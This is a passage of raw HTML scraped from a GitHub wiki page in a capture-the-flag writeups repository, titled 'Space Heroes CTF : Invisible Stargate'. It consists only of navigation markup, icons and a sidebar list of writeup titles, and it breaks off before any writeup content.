0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> not1cyyy </span> <span>/</span> CTF-Writeups <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>7</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/not1cyyy/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4 page" id="wiki-wrapper"> <div class="d-flex flex-column flex-md-row gh-header"> <h1 class="flex-auto min-width-0 mb-2 mb-md-0 mr-0 mr-md-2 gh-header-title">Space Heroes CTF : Invisible Stargate</h1> <div class="mt-0 mt-lg-1 flex-shrink-0 gh-header-actions"> Jump to bottom </div> </div> <div class="mt-2 mt-md-1 pb-3 gh-header-meta"> Firas Chaib edited this page <relative-time datetime="2022-04-17T00:40:52Z" class="no-wrap">Apr 17, 2022</relative-time> · 2 revisions </div> <div id="wiki-content" class="mt-4"> <div data-view-component="true" class="Layout Layout--flowRow-until-md Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-sidebar"> <div class="wiki-rightbar"> <div id="wiki-pages-box" class="mb-4 wiki-pages-box js-wiki-pages-box" role="navigation"> <div class="Box Box--condensed color-shadow-small"> <div class="Box-header js-wiki-toggle-collapse" style="cursor: pointer"> <h3 class="Box-title"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toggle-display"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-right js-wiki-sidebar-toggle-display d-none"> <path d="m6.427 4.427 3.396 3.396a.25.25 0 0 1 0 .354l-3.396 3.396A.25.25 0 0 1 6 11.396V4.604a.25.25 0 0 1 .427-.177Z"></path></svg> Pages <span>14</span> </h3> </div> <div class=" js-wiki-sidebar-toggle-display"> <div class="filter-bar"> <input type="text" id="wiki-pages-filter" class="form-control input-sm input-block js-filterable-field" placeholder="Find a page…" aria-label="Find a page…"> </div> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Home</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Home/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> GDG Algiers CTF : franklin last words</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/GDG-Algiers-CTF-:-franklin-last-words/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : Banner</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-Banner/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" 